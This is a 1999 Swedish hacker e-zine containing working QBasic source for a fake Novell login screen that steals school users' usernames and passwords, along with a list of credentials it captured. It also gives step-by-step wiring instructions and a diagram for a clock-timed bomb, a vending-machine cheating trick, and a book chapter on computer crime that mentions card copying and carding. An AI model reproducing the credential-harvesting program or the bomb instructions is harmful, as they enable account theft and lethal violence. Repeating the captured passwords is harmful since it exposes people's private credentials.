OBS! Denna textfil ingår i ett arkiv som är dedikerat att bevara svensk undergroundkultur, med målsättningen att vara så heltäckande som möjligt. Flashback kan inte garantera att innehållet är korrekt, användbart eller baserat på fakta, och är inte heller ansvariga för eventuella skador som uppstår från användning av informationen.
¯¯ ¯¯¯¯¯ /¯¯¯¯¯¯¯/¯¯/ /¯¯/¯¯¯¯¯¯¯/¯¯¯¯¯¯¯/¯¯¯¯¯¯¯/¯¯/ /¯¯/
¯ ¯¯ ¯¯¯¯ ¯ / /_/ / /_/ / /_/ / /¯¯¯¯¯/ /¯/ / /_/ /
¯ ¯¯¯ ¯ ¯¯¯ / _____/ / __/ __/ / ¯¯ / __/
¯¯ ¯¯¯¯¯ ¯¯¯ / / / /¯/ / /¯/ / /_____/ /¯/ / /¯/ /
¯¯¯ ¯¯¯¯ ¯ /__/ /__/ /__/__/ /__/_______/__/ /__/__/ /__/
Public domain! /¯¯¯¯¯/¯¯¯¯¯/¯¯¯¯¯/ ¯¯¯¯ ¯ ¯¯
Nummer: #13 1999-07-02 / / /¯¯/ / / / ¯¯ ¯¯¯ ¯¯¯¯¯
Information wants to be free / / /¯¯¯__/ / / ¯ ¯¯¯ ¯¯¯ ¯ ¯
/_____/_____/_____/ ¯¯ ¯¯ ¯¯¯¯¯
.-------.
Innehåll
'-------'
¤ Ledare
¤ Nostalgi - länge leve qbasic?
¤ Spräng ämnen #3
¤ Mysko ASCII
¤ Godisautomat Exploit
¤ Copyright finns inte 2.0 - Databrott
.-----.
Ledare
'-----'
Gizmo proggar Quick Basic och snor (admin)konton på skolan =). Han har ju
gjort den fetta Novell login faken! Ett bra program som är med i detta nummer.
Troligen kommer en ny design på sidan snart också. Zitech lär ha lämnat SPA
för ett tag sedan. Jävla mysko program jag införskaffade, programmet ladde
till något i stil med format C: | y i autoexec.bat tur att man hade Norton
Unformat... Jaja, Clownen i VSP, springer omkring och leker k-rad eleet hax0r,
allas vår co14... eller är det Clown14? Om du vet kan du ju alltid mail på
anonym4@hotmail.com... Försöker själv få lägre telefonräkning, så jag orkar
inte hänga omkring i CyberSpace på ett litet tag, men Phreak 020 kommer ut.
H0H0, AftonBladet Chatten suger fett eftersom jag vet en liten exploit... =)
Jag ska väl dra ut på en container runda snart också... Nej, tro på elajten!
Om du åker fast för att ha prövat något illegalt härifrån så referera gärna
till zinet =), men det är inte vårt fel att du åker fast. Det är ju en fördel
om du läser detta zine i edit eller något annat program som kan läsa DOS
text(inte notepad). Let's Phreak...
Denna gång i zinet kollar vi på följande Nostalgi, Sprängämnen, Mysko ASCII,
Godisautomat Exploit och Copyright finns inte 2.0.
.----------------------------.
Nostalgi - länge leve qbasic?
'----------------------------'
Jag satt i skolan en dag och ville bli admin (det var ju bara han som hade
internet ax) så jag började progga en backdoor i qbasic =). Jag trodde aldrig
det skulle gå men det gick ju bättre än väntat. Inom en vecka så gick jag och
kolla i filen diz.dat på skrivar datorn i datasalen:
"sfadmin","vivo"
"pelle","elevsf"
"JasminL oop",""
"MariannA_yum","xr945"
"LindaS_GXQ","AB171"
"tobias","0687"
"sfadmin","vivo"
"jeanettem","ux046"
Haha, vilket jävla cp lösenord. Killen är ju CP! Nuförtiden har jag MVG på
alla proven, undrar varför =).
Här är källkoden:
<------------------------------ KLIPP HÄR --------------------------------->
' *** Lam backdoor av Gizmo ***
CLS
SCREEN 9
COLOR 1, 4
COLOR 14
PRINT ""
PRINT " Novell IntranetWare Client" ' Falsk novell-login skärm.
COLOR 15
PRINT " --------------------------"
COLOR 1, 4
PRINT ""
PRINT ""
OPEN "diz.dat" FOR APPEND AS #1
COLOR 15
INPUT " Enter your username: ", uname$
PRINT " "
PRINT " Enter your password: "
Y = 8
X = 29
DO
key.press$ = INPUT$(1)
IF key.press$ = CHR$(13) THEN GOTO achmed
IF key.press$ = CHR$(8) THEN
star2$ = ""
password2$ = ""
FOR q = 1 TO LEN(star$)
star2$ = star2$ + " "
NEXT q
FOR q = 1 TO LEN(password$)
password2$ = password2$ + " "
NEXT q
IF LEN(password$) > 0 THEN
password$ = LEFT$(password$, LEN(password$) - 1)
star$ = LEFT$(star$, LEN(star$) - 1)
PRINT password2$
LOCATE Y, X
PRINT star2$
LOCATE Y, X
PRINT star$
ELSE BEEP
END IF
END IF
IF key.press$ <> CHR$(13) THEN
IF key.press$ <> CHR$(8) THEN
IF LEN(password$) < 20 THEN
password$ = password$ + key.press$
star$ = ""
V = LEN(password$)
FOR c = 1 TO V
star$ = star$ + "*"
NEXT c
LOCATE Y, X
PRINT star$
ELSE BEEP
END IF
END IF
END IF
achmed:
LOOP UNTIL key.press$ = CHR$(13)
WRITE #1, uname$, password$
CLOSE #1
COLOR 14
PRINT ""
' Falska login meddelande.
PRINT "Your current context is SOFIELUND"
PRINT "User: Guest Context: SOFIELUND"
PRINT "Your current tree is: SOFIELUND"
PRINT "You are attached to server FRIDA."
PRINT "LOGIN-4.20.42-470: The specified drive mapping is an invalid path:"
PRINT "(ROOT H:=SYS:USERS\HEM)"
PRINT "LOGIN-4.20.42-430: The following drive mapping operation could not be completed."
PRINT "[ROOT P:=SYS:PROGRAM]"
PRINT "The error code was 8989."
PRINT "LOGIN-4.20.42-430: The following drive mapping operation could not be completed."
PRINT "[ROOT T:=SYS:DATA\PEDAGOG]"
PRINT ""
PRINT "The error code was 8989."
PRINT "You are attached to server AXIS30ACB0You are attached to server AXIS30AEF8LOGIN-4.20.42-470: The specified drive mapping is an invalid path:"
PRINT "(ROOT Y:=SYS:USERS\BIBLIO)"
PRINT "Drives A,C map to a local disk."
PRINT "Drive F: = FRIDADrive G: = FRIDA_SYS:USERS\GEMENSAM \"
PRINT "Drive H: = FRIDADrive I: = FRIDA_SYS:DATA\INFORMAT \"
PRINT "Drive M: = FRIDADrive O: = FRIDA_SYS:DATA\APPS \"
PRINT "Drive R: = FRIDADrive V: = AXIS30ACB0_NW\SYS:CD \"
PRINT "Drive W: = AXIS30AEF8 ----- Search Drives -----"
PRINT "S1: = Y:\PUBLIC [FRIDA_SYS: \PUBLIC]"
PRINT "S2: = Z:\PUBLIC [FRIDA_SYS: \PUBLIC]"
PRINT "S3: = c:\windows\COMMAND"
PRINT "S4: = C:\NOVELL\CLIENT32"
CLS
SCREEN 0
<------------------------------ KLIPP HÄR --------------------------------->
För att kompilera det här programet (göra det till .exe) behöver du qbasic 4.5.
Du kan hitta det på nätet någonstans.
//Gizmo
.--------------.
Spräng ämnen #3
'--------------'
Jag ska nu skriva lite om sprängämnen och tänker ta upp, det inte allt för
avancerade ämnet, tidsinställda bomber. Det som står har jag själv lärt mig
med viss logik och genom tidningar, men jag har ej prövat det själv men det
borde fungera i ren teori...
Du behöver:
¤ En reseklocka, med timvisare av metall
¤ Ett batteri(Gärna ett 9 Volts med stora poler)
¤ Tre kablar som leder elektricitet eller tre krokodilklämmor
¤ Sprängämne, typ dynamit eller något annat...
¤ En elektroniskt styrd detonator
Koppla enligt följande schema:
XX = Dentonator, kopplad till Sprängämne
__________________ _________
| |XX| /----------------------------------| |
| Sprängämne |XX|< | |
|__________________|XX| \------------\ /--------------| |
| | | |
| | Klocka --> |_________|
+ \____/ -
| |
| |
Batteri ----> |____|
_____________________
| |
| 12 |
| |
| 9 3 |
| \ |
| \ |
| 6 * \ | <--- Klockan, Zommad och framifrån sedd.
|_____________________|
* = Kabel från batteri, som står rakt upp ur ett hål...
\ = Timvisaren som kabeln från detonatorn är fast kopplad med...
Koppla detonatorn till sprängämnet. Koppla två av kablarna till detonatorn.
Koppla ena av dom två kablarna till ena polen på batteriet. Koppla den tredje
kabeln till den andra polen på battariet. Nu tar du bort minutvisaren på
klockan och, om det finns, sekundvisaren från klockan. Detta kan bli lite
krångligt... Koppla in kabeln, som sitter fast i detonatorn, på timvisaren.
Var noggran med var på timvisaren du kopplar in kabeln, tänk på att kabeln ska
sitta fast medans timvisaren snurrar. Ta nu kabeln från batteriet och skala
den. Träd sedan in den i klockan, och se till så att den kommer upp vid det
timslaget du vill att bomben ska explodera.
När timvisaren träffar kabeln bildas en sluten krets och den elektroniska
dentonatorn gör så att sprängämnet exploderar...
//Celsius
.----------.
Mysko ASCII
'----------'
Nu är Phreak 020 ASCII #1 här... inte dåligt!
\ /
\ /
________\/_______
| _____________ |
| | | |
| | SAJBER | | <--- MeglaW's tv, fattar du inte varför så är det
| |_____________| | din också...
|_________________|
___________
| |
| _____|
| | __
| | / \ <- Min kaffekokare....
| | | |
| |_|__|_
|___________|
_________________________
| US Robotics Hayes |
| ¤ ¤ ¤ ¤ ¤ AT&T | <- Modem....
|_________________________|
_______________________________
| |
| FREE KEVIN | <- Ja, idén kom från 2600...
|_______________________________|
___ ___ _______ _________ _______
| | / / | ___ | | ___ | | ___ \
| |/ / _____ | |___| | | |___| | | | \ |
| | \ |_____| | / | ___ | | | | | <- Asballt!
| |\ \ | |\ \ | | | | | |___/ |
|___| \___\ |__| \__\ |__| |__| |_______/
___ _______ _______ ____________
| | | ____| | ____| |____ ____|
| | | |____ | |____ | |
| | | ____| | ____| | | <- Elajten!
| |_____ | |____ | |____ | |
|_________| |_______| |_______| |__|
//Celsius
.-------------------.
Godisautomat Exploit
'-------------------'
En bra exploit som morsan och syrran lärde mig...
Vissa godisautomater, speciellt tuggummiautomater, ska man lägga i en krona
och dra runt ett varv i ett vred. Ta och dra runt vredet fort som fan, så
länge du kan så kommer du få 10-15 tuggummin, om du har tur, för samma pris
som ett tuggummi...
//Celsius
.-----------------------------------.
Copyright finns inte 2.0 - Databrott
'-----------------------------------'
Här är den tionde delen till den kända boken Copyright finns inte, Version
2.0. För att kunna läsa den så används en speciell teknik för att markera feta
och kursiva ord. Om ett ord markers med _understreck_ så betyder det att ordet
är i fet stil, och är det *stjärnor* runt ett ord betyder det att ordet är
kursivt. Det kommer komma ett nytt kapitel i varje nummer tillsvidare...
Bokens hemsida är: http://www.df.lth.se/~triad/book/
_DATABROTT: TERMINALSLAVAR, PLASTKORTSBEDRAGARE OCH CENSUR_
Vad är egentligen databrott? Vart går gränsen mellan harmlöst utforskande
av ett datasystem och verkliga brott?
I lagens bokstav är databrott alla brott där en dator är inblandad på
något vis. Om jag slog någon i huvudet med en avstängd dator skulle det i
princip kunna betraktas som databrott. En lite smalare definition skulle kunna
vara att ett databrott är ett brott där information i telerymden utan
tillstånd förflyttas eller skadas. Det brukar stämma in för det mesta. De
myndigheter i Sverige som bekymmrar sig mest för databrott är: *Polisen,
Säkerhetspolisen (Säk, SÄPO), Militär Underrättelsetjänst och Kontraspionage,
Brottsförebyggande Rådet (BRÅ), Civildepartementet* och *Datainspektionen*.
Utöver dessa finns *storföretagens egna säkerhetsorganisationer* och en
del *idéella sammanslutningar, informella nätverk* samt (givetvis) *kriminella
organisationer*. Det är inte särskilt förvånande att alla dessa människor
presenterar problemen på helt olika vis.
Rikspolisstyrelsen delar in databrotten i följande kategorier:
_1. Dator eller programvara som använts som brottshjälpmedel_
_2. Dator eller programvara som utsatts för brottslig påverkan_
_3. Programvara som kopierats eller förändrats_
_4. Obehörigt intrång eller obehörig användning av datorer eller
datornätverk_
De flesta databrott som begås har ingenting alls med hackare att göra. För det
mesta handlar det om personal på banker, posten, försäkringskassor eller
privata företag som har hand om utbetalningar. Många faller för frestelsen när
de ser hur *lätt* det är att förflytta pengar fram och tillbaka mellan konton,
bevilja sig själva studiemedel eller socialbidrag, förfalska fakturor etc. Det
är egentligen bara en "förbättring" (förvärring?) av den gamla vanliga
ekonomiska brottsligheten. Ett exempel är en svensk socialtjänsteman som 1982
skrev ut 400.000 kronor i socialbidrag åt sig själv, och sedan åkte till
Venezuela för att lösa ut en kompis som satt i fängelse för politisk
verksamhet. Detta kunde han göra därför att han kände till vissa brister i
utbetalningssystemet: utbetalningarna rapporterades inte mer än var 14:e dag.
Detta är typiskt för den absolut mest omfattande formen av databrott. I
jämförelse med sådana här brott är hackande och phreakande en piss i
Missisippi. De värsta databrotten begås av folk med en respektabel position,
och avslöjas nästan *aldrig.* Men det visste du ju redan.
Anledningen till att dessa databrott inte får lika mycket publicitet som
hackarnas små pojkstreck är att de dels pekar på något mycket känsligt:
sammanhållning och moral på det egna företaget eller myndigheten är absolut
viktigast om man vill skydda sig från yttre hot. Det är dessvärre betydligt
svårare att försäkra sig om att de egna anställda trivs och är lojala mot
företaget än att skylla på hackare som kommer utifrån. Principen har med
framgång tillämpats av hela länder för att slippa ta itu med den egna
problematiken. Genom att skylla på exempelvis judar, kommunister eller
muslimer kan man få en klar hotbild och en måltavla för sina aggressioner,
samtidigt som man slipper diskutera sina egna problem.
Den verklige databrottslingen ser ut som följer: medelålern ligger mellan
30 och 40 år. Hälften av brottslingarna har jobbat mer än 10 år inom
företaget. *45% är kvinnor.* Hackare? Knappast. (Källa: Nätvärlden #8/1994 sid
36.)
Så långt interna databrott.
Ett lite mer "hackaraktigt" brott är att lura bankomater eller
kreditkortsföretag. När bankomaterna var nya i Sverige på 1960-talet och
uttagen fortfarande lagrades på hålremsor inne i maskinerna, var det någon som
sprang runt mellan en massa bankomater med förfalskade bankomatkort och
lyckades ta ut i runda tal 900.000 kr över en påskhelg. Det är inte lika lätt
idag. Kanske. Flera svenska hackare har tillgång till de apparater som behövs
för att läsa och skriva magnetkort. De har dessutom luskat ut *mycket* om vad
det är för information som lagras på korten, och vad som inte lagras där, mest
av allmänt intresse för systemet.
Det är dock inte så lätt att ta sig in i en bankomat "bakvägen". Bankerna
har byggt upp ett eget telenät som man inte kommer åt med en vanlig telefon,
och det är via detta som transaktionerna till bankomaterna sker.
Jag fascineras själv ständigt över vilken tilltro folk har till
magnetkort. Alla kort med en magnetremsa, typ minutenkort, lånekort osv, är
standardiserade och kan kopieras med rätt utrustning. En vän till mig roade
sig med att ta ut pengar på sitt gamla lånekort. Han hade helt enkelt kopierat
informationen från sitt bankomatkort till lånekortet. Jag blev heller knappast
förvånad när jag i april 1995 fick veta att några ungdomar i Helsingborg
kopierat länstrafikens busskort och sålt dem för halva ordinarie priset.
(Hackaren *Wolf* som jag nämnde i kapitel 4.) Televerkets egna telefonkort
håller skrämmande låg säkerhetsnivå; likaså de kort som används till
GSM-telefoner och satellitdekodrar. Det rör sig alltför ofta om helt oskyddade
standardformat.
Apropå kort: *Kreditkort* är dessvärre väldigt populära bland hackare. Låt
oss titta på lite statistik från 1989 då det fanns mellan 6 och 7 miljoner
kort i Sverige. Detta år var omsättningen via kort 20-30 miljarder kronor per
år uppdelade på c:a 50 miljoner transaktioner på i medeltal 400 kronor. Det
gjordes på denna tid 18.000 anmälningar om bedrägerier varje år, där varje
anmälan kunde innefatta sisådär 50 bedrägerier (alltså att någon har handlat
på någon annans kort 50 gånger innan det hela polisanmäldes). Polisen utreder
helst inte sådana bedrägerier om det inte rör sig om minst 50.000 kronor. Vad
siffrorna är idag vågar jag inte ens drömma om. Vad vi kan konstatera är att
det inte är särskilt troligt att de där 18.000 bedrägerierna begicks enbart av
hackare.
Det är ofta rent löjligt lätt att ringa gratis eller handla varor på någon
annans kreditkort. Tidigare, när kontrollen inte var så hård, var det många
hackare som *"kortade"* varor från utlandet. Speciellt datautrustning och
liknande, såklart. Hur man stjäl kortnummer med social ingenjörskonst,
skräprotning etc, har jag redan tidigare illustrerat.
Om du råkar ut för att en phreakare länsar ditt kreditkort kommer du
aldrig att få veta det. Kreditskortsföretagen talar aldrig om detta för sina
kunder. Det vanligaste är att man säger att det blivit *"något tekniskt fel"*.
Med undantag för stöld av kreditkortsnummer och tillhörande
säkerhetskoder, är det en hackare sysslar med inte databrott i hans/hennes
egna ögon. Som databrott räknar en hackare ett brott som begås med hjälp av
datorer för att uppnå något annat än tillgång till information. En brottsling
som använder hackarmetoder är alltså ingen hackare, utan en databrottsling.
Hackande i traditionell bemärkelse handlar om nyfikenhet, *inte* om girighet.
_Sabotage_
Datasabotage är en ganska ovanlig, men mycket gammal form av databrott.
Ordet *sabotage* kommer från franskans *sabbot* som betyder träsko. Det heter
så för att arbetarna på de franska väverierna slängde träskor i de automatiska
vävstolarna eftersom de var förbannade på att maskinerna tagit jobben ifrån
dem. En automatisk vävstol är ju på många sätt ganska lik en dator, så man kan
säga att sabotage från början var just datasabotage. Denna typ av verksamheter
har förkommit sedan den engelske upprorsmakaren _Ned Ludd_ och hans
*luddister* förstörde vävstolar och spinnmaskiner i mitten av 1700-talet.
Svenska anarkister har ofta sagt att de skall sabotera datacentraler.
(Bland annat genom den underjordiska tidningen *Brand*.) Som de flesta av
anarkisternas hot så rör det sig mest om att lova runt men hålla tunt. Svenska
anarkister har nog lite svårt att hitta och komma åt datacentraler, varför de
nöjer sig med att förstöra Shellmackar och andra mer lättidentifierade mål.
IRA har däremot bombat några datorer på Nordirland, och i Amerika tog sig
några fredsaktivister som kallade sig _Beaver 55 _redan 1969 in på en
datacentral vid ett kemiföretag i Michigan och raderade 1000 databand som
skall ha innehållit planer på kemiska vapen. Detta skedde med hjälp av helt
vanliga magneter. (Kanske något för plogbillarna?)
Det har även funnits en aktivistgrupp i Frankrike vid namn _CLODO_ (Comite
de Liberation Ou de Detournement des Ordinateurs). Mellan 1979 och 1983
förstörde dessa aktivister ett antal datorer vid företag i Toulouse-området.
De ville protestera mot datasamhället som de menade använde datorer till att
kontrollera människor - en direkt efterföljare till de ursprungliga
träskoaktivisterna i god fransk tradition. Detta är som synes en militant gren
av de medborgarrättsrörelser som EFF och Chaos Computer Club tillhör.
Det kanske otäckaste exemplet på den här formen av aktioner är den sk
*Unabombaren*, en person som sedan 1978 misstänks ha genomfört 16 sprängdåd
som sammanlagt dödat 3 personer och skadat 23. Onsdagen den 2 augusti 1995
publicerade *Washington Post* och *New York Times* utdrag ur ett manifest från
personen i fråga, som visade sig vara välskriven argumentation mot teknikens
utbredning i samhället.
Det är inte bara den fysiska utrustningen som utsätts för sabotage. Man
kan givetvis även sabotera dataprogram eller annan information som finns
lagrad i datorn. En redaktör vid Encyclopedia Britannica i Chicago blev så
syrak för att han blev avskedad att han ändrade en massa ord i uppslagsverket.
Bland annat ändrade han *Jesus* till *Allah*. Det finns otaliga exempel på
anställda som hämnats på sina arbetsgivare på liknande vis.
Ett annat sabotage inträffade i Israel. En 18-årig hackare lyckades genom
att ta sig in i en dator som tillhörde en israelisk tidning publicera en
påhittad nyhet om att hans datalärare blivit gripen och anklagad för
narkotikabrott i USA. (Ett ganska roligt *hack* om jag får säga det själv, men
ändå rätt allvarligt om man ser till massmedias betydelse i vårt samhälle.
Jämför *Captain Midnight*, kapitel 4.)
_Nassar_
Att som phrekarna sprida stulna kontokortskoder, passerkoder till olika
datasystem och liknande är givetvis också olagligt. En del BBS:er som
*Ausgebombt* har annonser om vapen, anabola steroider och varor som skulle
kunna vara stöldgods. De kan också innehålla grov barn- eller våldspornografi
eller rasistiska budskap. Svenska nazister har för länge sedan upptäckt den
nya tekniken, och använder den flitigt för att kommunicera. Åtminstone en
organisation som jag känner till och som har anknytning till VAM har haft
datorintresserade patrioter som gästföreläsare.
Att vara rasist är dock inte förbjudet. Hets mot folkgrupp, alltså
spridande av lögnaktiga uppgifter, är däremot mycket förbjudet. Jag tycker
personligen inte att det här har så mycket med hackardebatt att göra. De
flesta hackare är inte rasister, och inte ett dugg intresserade av varken
anabola steroider, stulna vapen eller barnpornografi. När det gäller BBS:er
skall man följa samma lagar som gäller i samhället i övrigt: om du ser något
misstänk i en svensk BBS som du tror kan vara åtalbart - ring polisen. Tänk
också på att de som är så engagerade i en politisk rörelse som nynazismen att
de lägger ned tid och arbete på att starta BBS:er inte är det utan anledning.
Innan du låter dina tankar och handlingar styras av hat och avsky skall du
tänka på att dessa personer faktiskt många gånger *har* tänkt igenom vad de
gör. Har du det?
Att uppvigla till brott eller sprida rasistiska budskap är lika förbjudet
oavsett om det sker med en dator eller med vanliga tidningar och flygblad. På
Internet brukar de systemansvariga vara så pass samvetsgranna att de rensar
bort sådant här skit när de får veta att det förekommer. Om man hittar något
suspekt på Internet är det enklaste att ta reda på vem som är ansvarig för den
dator som informationen lagras på, och göra denne uppmärksam på detta. Att
ringa svensk polis är för det mesta meningslöst eftersom den största delen av
Internet finns utomlands, framför allt i USA. I vissa länder är det inte ens
ett brott att sprida rasistisk information mm. I sådana fall är svenska staten
idag nästan helt maktlös.
Det enda sättet för en myndighet att komma åt information som lagras i ett
land med liberal lagstiftning är att antingen koppla bort landets datorer
(vilket inte är särskilt lätt, eller ens önskvärt) eller genom internationell
lagstiftning i FN. Men det finns ett annat sätt! Internet är byggt av
människor, för människor och verkar genom människor. *Du kan säga din
uppriktiga mening till den som är ansvarig för att sprida informationen*. Du
kan också i värsta fall övertala den som är ansvarig för datorn där
informationen lagras att ta bort den. Innan övergår till sådana åtgärder bör
man dock tänka sig för både en och två gånger. Internet betraktas nämligen av
många som ett enda stort bibliotek där var och en själv söker reda på vad hon
eller han vill ha, och om du kommer med idéer om att s a s "censurera" detta
bibliotek måste du också beakta att du angriper det fria ordet, och vara
beredd att ta ansvaret för detta. Din handling är i ett sådant fall att
likställa med att gå ner till närmaste bibliotek, plocka ut böcker ur
hyllorna, ta ut dem på gatan och bränna upp dem.
Informationstekniken har på så vis tagit hem världsproblemen till ditt
skrivbord. Är det då inte för roligt! Nu går det inte att avskärma sig från
problemen i världen, utan man måste engagera *sig själv*. Kryss i taket! Själv
tycker jag att den här diskussionen är så nyttig för det svenska folkhemmet
att det helt uppväger det hot som denna "farliga" information utgör.
Sri-lankas och Elfenbenskustens problem är helt plötsligt också våra problem.
Så länge barnporr är tillåtet någonstans i världen kommer vi också att ha
sådant material här, i vårt eget Internet. Personligen trivs jag faktiskt med
detta, och hoppas att vi lär oss något av det. När det gäller sådant här är
problemet *allas*, precis som med miljöproblemen. Problemet skall lösas där
det hör hemma: i världen. FN kanske.
_Polisen_
Den svenska polisen i form av Rikspolisstyrelsen har en expert på
databrott, nämligen polisöverintendent _Hans Wranghult_ i Malmö. Han är liksom
de flesta andra europeiska experter på området utbildad i Kalifornien, USA.
Hans främsta arbete på området är en rapport som heter *Datakriminalitet -
Hackers, insiders och datorstödd brottslighet*, och som tycks vara
renskrivningar av hans anteckningar från skolan i USA, lätt anpassade för
svenska förhållanden. (Jag väntar med spänning på hans framtida alster.)
Trots att denna rapport är en mycket detaljerad genomgång av
databrottslighet och möjliga perspektiv förmedlar den dessvärre en kraftigt
förenklad bild av hackare. Det är tydligt att Hans mest har lyssnat på sina
lärare och inte frågat några amatörer vad de tycker om hackare. Stycket om
hackare inleds med meningarna:
*"Ursprungligen var ordet hacker en benämning på en person som inom den
organisation han arbetade hade till uppgift att testa ett datasystem.
Metoden för testen var att utsätta systemet för ett stort angrepp av
olika slag och att därigenom upptäcka fel och brister i programvaran
eller säkerhetssystemet."*
Detta är för det första inte sant, eftersom de första hackarna var studenter
som hade till uppgift att *utveckla* datasystem, och tyder på en grundsyn på
hackare som innebär att de alltid är ute efter att testa eller forcera
säkerhetssystem. Du som har läst den här boken från början vet att detta bara
är en ganska liten del av hackarkulturen.
En annan möjlighet är att Wranghult medvetet gör denna förenkling för att
motivera sina mannar. Polisen bygger sitt arbete på ett "vi mot dom"-tänkande,
och om han börjat tala om att det finns såväl snälla som dumma hackare hade
det kanske blivit lite väl suddiga gränser för vad lagen egentligen tycker om
hackare.
Speciellt kritisk är han mot bilden av hackaren som *hjälte*, vilket ha
tycker är ett ofog. Om han känt till hur journalister använt sig av hackare
som när Chaos Computer Club hackade fram uppgifter om det Västtyska
kärnenergiprogrammet eller när den anonyme hackaren tog sig in i BBS:en
*Ausgebombt* i Vänersborg, hade han varit tvungen att nyansera sin
svartmålning av hackarnas verksamhet.
Tydligen har polisen tänkt igenom det här en andra gång, för i juni 1995
gjorde man gällande att man mycket väl kunde tänka sig att ta hjälp av hackare
för att komma till rätta med databrottsligheten.
När det gäller SÄPOs intresse för hackare och annan datakultur är det inte
mycket man får veta. Det är i och för sig inte så konstigt, eftersom det är så
det fungerar. _Bengt Angerfelt_ och _Roland Frenzell_ arbetar som utredare i
datasäkerhetsfrågor på SÄPO, och deras arbete består antagligen mest i att
samla information och kunskaper om databrott så att det finns någon som kan
vidta åtgärder om rikets säkerhet hotas. Förhoppningsvis vet de mer om
datasäkerhet än någon annan i Sverige. Med tanke på fiaskot på
krypteringsområdet borde man ha sett över sin expertis vid det här laget.
Även den militära underrättelsetjänsten intresserar sig givetvis för
datasäkerhetsfrågor. Om detta vet jag ännu mindre, det enda jag säkert vet är
det som är välkänt bland hackare: Den militära underrättelsetjänsten samlar på
alla upplysningar den kan få om system- och datasäkerhet. Dessa uppgifter
använder de sedan till att förbättra *sin egen* säkerhet. Ingen militär skulle
någonsin få för sig att föra ut kunskaperna till stat och näringsliv. Det
finns uppenbara skäl till detta:
Näringslivet, och främst dataföretagen, är angelägna om att utrustningen
är säker. Om t ex det amerikanska NSA (National Security Agency) talade om för
ett företag som tillverkade ett visst operativsystem var säkerhetsbristerna
fanns skulle detta genast åtgärdas. *Varför ligger detta inte i de militära
underrättelsetjänsternas intressen?* Mycket enkelt, faktiskt: Eftersom
datasystemen exporteras kan militären använda säkerhetsluckorna för att
angripa utländska datasystem i händelse av krig. Militären (åtminstone den
amerikanska) har ju sina egna hackare och virustillverkare. Jag menar, varför
inte? Det är knappast några kontroversiella vapen, och de begränsas inte av
internationella överenskommelser. Klart att de har beväpnat sig till tänderna
med verktyg för elektronisk krigföring. Genom att känna till bristerna kan man
skydda sig själv och angripa andra. Av samma anledning skulle svensk
underrättelsetjänst aldrig tipsa Ericsson om säkerhetsbrister i AXE-systemen.
Ett antal av Sveriges skickligaste hackare har anställts som
säkerhetsexperter av såväl SÄPO som militär underrättelsetjänst och
kontraspionage. Förmodligen använder man sig av denna kompetens för att
möjliggöra "avlyssning" av elektronisk kommunikation. (Vilket inte är
förbjudet, till skillnad från telefonavlyssning.)
_Storebror Vill Se Dig_
Men spridande av "samhällsfarlig" information då? Det är inte lika
självklart att påstå att information som t ex *Terroristens handbok,
narkotikarecept, bombritningar* eller kanske *tekniska beskrivningar av
televerkets telefonkort* skulle vara olaglig. Ett populärt begrepp är att
kalla detta något så lustigt som *sociopatisk information.* Att vara sociopat
innebär att man är *socialt missanpassad* och tillhör en grupp som inte
accepterar den i samhället rådande normen för normal människa.
Alla hackare, ravare, anarkister, nazister, frimurare och liknande små
grupperingar är därför att betrakta såsom sociopater. Så även Rotary.
Sociopatisk information är följaktligen information som är skriven av socialt
missanpassade människor, eller möjligen information som beskriver hur man
skall bete sig för att bli en socialt missanpassad människa. Att exempelvis
sprida liberala idéer i ett totalitärt kommunistiskt land måste betraktas som
synnerligen sociopatiskt.
Det är inte förbjudet att vara socialt missanpassad. Det är inte ens
förbjudet att sprida sociopatisk information. Men det finns en del auktoritära
element inom vårt samhälle som gärna skulle se att det var det. Under mitt
arbete med denna bok har jag lyckligtvis bara hittat ett enda genuint exempel
på denna storebrorattityd:
I en liten skojig rapport från _Institutet för Rättsinformatik_ i
Stockholm som heter *Kriminella Teknikzonen* har en jurist som heter _Anders
Wallin_ skrivit mycket om hur *han* tycker att lagen ser på sociopatisk
information. I en rapport på över 50 sidor lyckas han med konststycket att
upprepade gånger fördöma denna sk sociopatiska information, utan att en enda
gång nämna att den faktiskt inte är förbjuden. Istället lutar han sig tillbaka
på ett juridiskt paradigm (tankemönster) som innebär att allt som hotar
samhället så som det ser ut i dag per definition är farligt. Överfört till
ideologi skulle detta kallas konservatism.
Han nämner bland annat att han inte kunnat hitta den sociopatiska boken
*The Anarchists Cookbook* på något svenskt bibliotek, och fortsätter med att
ondgöra sig över att liknande information finns tillgänglig i flertalet
svenska databaser. Han nämner dock inte att denna bok varit uppe till
granskning - och blivit *friad.* Vill man läsa en riktigt sociopatisk bok kan
man leta redan på _Jerry Rubins_ *Snacka inte bara* som finns på flera svenska
bibliotek. Den är dessutom utgiven på det respektabla förlaget Pan/Nordstedts.
_Nikanor Teratologens_ *Äldreomsorgen i Övre Kågedalen* är ett annat exempel
på "tvivelaktig" litteratur. Listan kan göras lång.
Med sociopatisk information menas tydligen böcker som inte vanliga
människor skall läsa, för då blir de förstörda. Eller: böcker som inte
ungdomar bör läsa, för då blir de förstörda. Eller: böcker som vissa skall få
läsa men inte alla, för man kan inte lita på deras omdöme. (Själv är jag
ganska barnsligt förtjust i tryckfrihet.)
Samtidigt måste jag poängtera att jag inte tycker att allt i Wallins
rapport är dumt. Det jag tycker är dumt är det underförstådda rop på censur
som ligger mellan raderna på en hel del ställen i den här rapporten. Wallin
tycker att det är hemskt att unga pojkar skall få läsa sådana här hackarböcker
och terrormanualer. Och visst förstår jag honom - det finns de som har lyckats
ställa till ordentliga problem med de kunskaper de skaffat sig genom att läsa
sådana. Det var visst någon i USA som lyckades spränga sin lillasyster. Det
blundar jag inte för. Men han har tydligen *läst dem själv*...
Sådant retar såklart gallfeber på cyberpunkare, och betraktas med rätta
som överförmynderi. Ytterst ansvariga för att ungdomar inte bygger bomber
hemma torde deras föräldrar vara. Och är de så gamla att de flyttat hemifrån,
så anser jag faktiskt att man kan lita på dem. Faktiskt tror jag till och med
att de klarar av att läsa sådana här böcker, om det roar dem. Jag råkar anse
att en människa som tillverkar en bomb hemma i garaget helt klart måste ha mer
än en skruv lös, och för den skull skall inte vanliga, hederliga människors
yttrande- och tryckfrihet åsidosättas.
Jag skall erkänna en sak: jag äger massor med sociopatisk information. Jo,
det är faktiskt sant. Jag har bland annat använt den som underlag för den här
boken. Nästan all sådan information jag har är digital, och eftersom det roar
mig kopierar jag den gärna till var och en som är intresserad, vilket jag inte
ser som ett dugg ansvarslöst.
_Förbjuda Datavirus??_
Att förbjuda virustillverkning är också mycket tveksamt. Särskilt som man
inte har några planer på att förbjuda *innehav* av datavirus, bara
